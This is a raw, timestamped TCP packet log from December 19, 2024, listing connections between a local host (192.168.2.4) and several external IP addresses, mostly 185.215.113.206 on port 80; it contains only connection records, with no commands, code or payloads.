                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453022957 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453028917 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453039885 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453042030 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453051090 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453068018 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453103065 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453108072 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453119040 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453140974 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453166008 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453166962 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453182936 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453207016 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.453231096 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.454364061 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.454659939 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.457463980 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.466599941 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.466671944 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.466762066 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.466811895 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.467130899 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.467181921 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.467262983 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.467308998 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.467545986 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.467596054 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.467982054 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.468028069 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.468292952 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.468341112 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.468828917 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.468875885 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.469170094 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.469212055 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.469654083 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.469702005 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.470011950 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.470058918 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.470554113 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.470594883 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.470803976 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.470851898 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.471618891 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.471671104 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.471844912 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.471892118 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.472693920 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.472742081 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.472867012 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.472914934 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.473575115 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.473622084 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.473716974 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.473764896 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.474395037 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.474445105 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.474560022 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.474610090 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.475182056 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.475234985 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.475368977 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.475418091 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.475928068 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.475979090 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.476186991 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.476236105 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.476901054 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.476952076 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.477109909 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.477157116 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.477654934 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.477710962 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.477782965 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.477832079 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.518146038 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.518157005 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.518302917 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.519155979 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.519167900 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.519207001 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.522118092 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.522131920 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.522171974 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.591203928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.591221094 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.591283083 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.591345072 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.591535091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.597924948 CET8049724199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.597997904 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.602850914 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.602864981 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.602874041 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.602904081 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.602929115 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.603770971 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.603792906 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.603827000 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.603840113 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.604577065 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.604598999 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.604623079 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.604645967 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.605648994 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.605659962 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.605669975 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.605695009 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.605720043 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.606522083 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.606534958 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.606585026 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.607434988 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.607471943 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.609309912 CET44349742104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.609375954 CET49742443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.610387087 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.610431910 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.611370087 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.611417055 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.613665104 CET49742443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.613672018 CET44349742104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.613899946 CET44349742104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.616575956 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.616589069 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.616642952 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.616642952 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.618916988 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.618971109 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.620153904 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.620177031 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.620198011 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.620208025 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.621138096 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.621150017 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.621160984 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.621184111 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.621206045 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.621872902 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.621885061 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.621917963 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.621936083 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.622610092 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.622633934 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.622643948 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.622648954 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.622669935 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.622689962 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.634032965 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.634083986 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.634265900 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.634308100 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.634726048 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.634766102 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.634888887 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.634928942 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.635171890 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.635238886 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.635591030 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.635634899 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.636059999 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.636106968 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.636502981 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.636549950 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.636791945 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.636831999 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.662787914 CET49742443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.683896065 CET49742443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.683962107 CET49742443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.684015989 CET44349742104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.732251883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.738169909 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.738218069 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.738754988 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.738782883 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.738801003 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.738812923 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.739670038 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.739712954 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.739756107 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.740659952 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.740703106 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.749074936 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.749123096 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.750102997 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.750144958 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.753911018 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.753923893 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.753971100 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.756325960 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.756378889 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.757189989 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.757201910 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.757236004 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.758193016 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.758203983 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.758245945 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.759084940 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.759104967 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.759125948 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.759141922 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.759924889 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.759944916 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.759954929 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.759987116 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.760009050 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.760956049 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.760967016 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.761009932 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.762002945 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.762016058 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.762061119 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.763101101 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.763113022 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.763123035 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.763154030 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.763174057 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.763963938 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.763976097 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.763984919 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.764014959 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.764030933 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.764935970 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.764947891 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.764974117 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.764986038 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.765955925 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.765966892 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.765996933 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.766007900 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.766766071 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.766777992 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.766787052 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.766804934 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.766817093 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.849087954 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.849261999 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.849318981 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.849601984 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.849646091 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.849718094 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.849773884 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.850022078 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.850068092 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.850416899 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.850466013 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.850985050 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.851027966 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.851378918 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.851816893 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.851860046 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.852242947 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.852286100 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.852515936 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.852555037 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.853363037 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.853404045 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.853576899 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.853620052 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.854321003 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.854361057 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.854756117 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.854794025 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.855483055 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.855781078 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.855827093 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.856462955 CET8049737185.215.113.206192.168.2.4
